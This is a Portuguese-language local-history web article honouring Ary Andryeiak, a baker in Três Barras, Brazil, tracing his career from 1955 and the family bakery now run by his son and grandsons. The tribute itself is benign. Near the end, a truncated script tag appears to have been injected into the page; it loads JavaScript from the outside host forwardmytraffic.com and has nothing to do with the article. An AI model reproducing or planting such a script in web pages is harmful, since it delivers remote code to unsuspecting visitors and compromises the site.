Curiosidades do Passado Principais

História de sucesso: A Profissão de Padeiro de Geração em Geração

Fica nossa homenagem ao nosso amigo e grande pessoa Sr. Ary Andryeiak.  Aos que partem desta vida, a paz agora é eterna. Aos que aqui ainda estão, resta honrar e homenagear o legado que nos deixaram. 

 

História, trabalho e tradição familiar é o que não falta na vida de Ary Padeiro, como é conhecido Ary Andryeiak. Seguindo os caminhos do pai, iniciou em 1955, suas atividades de padeiro, ainda aos doze anos de idade, na padaria de Cyriaco Felicio de Souza. Passados seis anos, serviu no Exército brasileiro e com a morte do Seu Cyriaco, foi trabalhar numa panificadora em Canoinhas. Ele recorda do seu retorno para Três Barras e os primeiros tempos de trabalho.

 

 

Outros tempos, outras formas de produzir e comercializar. Aos 74 anos de idade, Ary Padeiro, nos conta com satisfação o início de sua profissão. A vontade de prosperar e a paixão pelo trabalho garantiram o sucesso de sua padaria.

 

Conhecida dos tresbarrenses, a Panificadora e Confeitaria Solange, ao longo dos anos, foi acompanhando a modernidade, adaptando sua produção.  Com novo nome, atualmente, a “Panificadora e Confeitaria Max Solange”, localizada na Rua Vereador Ricardo de Oliveira, nº 66, é administrada pelo filho de Ary Padeiro e entre os funcionários conta com a participação de dois netos. O amor a profissão e dedicação ao trabalho foi transmitida às novas gerações.

 

Para além de conhecer o funcionamento da Panificadora e Confeitaria Solange,  visitar suas instalações  é conhecer uma história de sucesso profissional e tradição familiar.

 

Ari Padeiro o Canhota no futebol de Três Barra

Filho Agnaldo

 

 

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Comente esta matéria: